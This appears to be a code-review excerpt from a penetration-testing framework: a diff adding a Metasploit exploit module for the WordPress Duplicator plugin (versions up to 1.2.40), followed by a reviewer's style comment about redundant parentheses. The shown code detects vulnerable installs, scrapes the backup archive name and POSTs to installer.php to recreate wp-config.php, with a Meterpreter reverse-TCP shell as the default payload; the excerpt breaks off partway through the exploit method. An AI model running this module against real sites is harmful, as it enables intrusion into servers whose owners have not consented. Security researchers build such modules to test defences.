modules/exploits/multi/php/wordpress_duplicator.rb

```diff
@@ -0,0 +1,141 @@
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    vprint_status("Checking URI #{rhost+tpath}")
+    response = send_request_cgi({ 'uri' => tpath}, timeout=datastore['TIMEOUT'])
+
+    unless response
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless response.code == 200
+      vprint_error("Server responded with #{response.code}")
+      return CheckCode::Safe
+    end
+
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
+    if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+      return CheckCode::Vulnerable
+    else
+      return CheckCode::Detected
+    end
+
+  end
+
+  def create_wp_config_file
+    # 1. GET the installer.php to retrieve the archive name.
+    response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])}, timeout=datastore['TIMEOUT'])
+    if response && response.code == 200
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      archive_name = archive_name.first.first
+      print_status("Found archive name #{archive_name}")
+      # 2. Perform the 1st step to actually create the wp-config.php file.
+      response = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => normalize_uri(datastore['TARGETURI']),
+        'vars_post'   => {
+          'action_ajax' => "1",
+          'action_step' => "1",
+          'archive_name' => archive_name,
+          'archive_engine' => "ziparchive",
+          'exe_safe_mode' => "0",
+          'archive_filetime' => "current",
+          'logging' => "1"
+        }
+      }, timeout=datastore['TIMEOUT'])
+      if response && response.code == 200
+        print_status("Successfully created the wp-config.php file!")
+      else
+        fail_with(Failure::Unknown, "The archive file #{archive_name} was probably deleted.")
+      end
+    else
+      fail_with(Failure::NotFound, "Failed to retrieve the archive name, cannot create the wp-config.php file.")
+    end
+  end
+
+  def exploit
+    print_status("Checking if the wp-config.php file already exists...")
+    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
+    response = send_request_cgi({ 'uri' => tpath_wp_config}, timeout=datastore['TIMEOUT'])
+
+    if response && response.code == 404 # we have to perform action_step 1 to create the wp-config.php file.
+      print_status("This WordPress was not restored. Creating the wp-config.php file...")
+      create_wp_config_file()
```

Comment:
`()` is redundant when no args are provided,

```suggestion
      create_wp_config_file
```